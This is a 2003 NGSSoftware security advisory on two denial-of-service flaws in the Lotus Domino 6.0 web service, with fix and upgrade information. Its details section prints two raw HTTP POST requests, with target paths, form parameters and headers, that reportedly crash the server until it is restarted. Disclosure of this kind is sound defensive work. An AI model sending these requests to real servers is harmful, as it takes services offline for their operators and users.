LOTUS DOMINO Denial Of Service Attacks 1 & 2
February 17th, 2003
NGSSoftware Insight Security Research Advisory
Name: LOTUS DOMINO Denial Of Service Attacks 1 & 2
Systems Affected: Release 6.0
Severity: Critical Risk
Category: Remote System Buffer Overrun
Vendor URL: http://www.lotus.com
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 17th February 2003
Advisory number: #NISR17022003d
Description
***********
Lotus Domino and Notes together provide a featured enterprise collaboration system,
with Domino providing application server services. Based on Netcraft's (www.netcraft.com)
January 2003 Server Survey, Lotus Domino is positioned 10th in the web server market,
totaling 78,031.
Details
*******
There exist two areas in which a denial of service attack can be launched against the web
services of Lotus Domino (nhttp.exe). In both instances, the web services would need to be
restarted by the Domino administrator.
Attack 1 - Incomplete POST Request
POST /test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=s_NotesForm;JournalEntry HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: http://ngssoftware/test2.nsf/($Journal)/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;
h_New,s_NotesForm;JournalEntry
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: ngssoftware
Content-Length: 8111
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Shimmer=ui:I&DNIDate:20021212&CalIDate:20021212&AMActive:1&NMTLP:20021217T032503Z&NMCount:0&CalView:D;
iwaSSL=0
Attack 2 - Fictionary Value Field POST Request
POST /test2.nsf/iNotes/Proxy/?EditDocument&Form=s_Validation&PresetFields=s_ValId;MailPreferenceEdit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://192.168.0.1/test2.nsf/iNotes/$new/?EditDocument&Form=h_PageUI&PresetFields=h_EditAction;h_New,
s_NotesForm;ShimmerMailPref
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; (R1 1.3); .NET CLR 1.0.3705)
Host: 192.168.0.1
Content-Length: 2548
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Shimmer=DNIDate:20030114&CalIDate:20030114&NMTLP:20030114T191749Z&NMCount:0&SI_TLM:20030115T020722%2C4
0Z&MOFolder:%28%24Drafts%29&MOFolderLabel:Drafts&MOTLM:20030115T000509%2C10Z&ui:I; iwaSSL=0
Fix Information
***************
IBM Lotus Notes and Domino Release 6.0.1 is currently available and is being marketed as the first
maintenance release. It goes on to say that if customers haven't already upgraded or migrated to Notes and
Domino 6, now is the time to move and start reaping the benefits of this existing and highly praised release.
Release 6.0.1 includes fixes to enhance the quality and reliability of the Notes and Domino 6 products. It
does not, however, mention any security issues, and NGS strongly advises upgrading as soon as possible, not
to reap the benefits but to secure yourself and your data against possible web-based or network attacks.
The upgrade / patch can be obtained from
http://www14.software.ibm.com/webapp/download/search.jsp?q=&cat=&pf=&k=&dt=&go=y&rs=ESD-NOTECLNTi&S_TACT=&S_CMP=&sb=r
A check for these issues has been added to DominoScan R2, a comprehensive automated intelligent assessment
tool for Lotus Domino Servers. More information is available from the NGSSoftware website,
http://www.ngssoftware.com/software/dominoscan.html
Further Information
*******************
For further information about the scope and effects of buffer overflows, please see
http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf



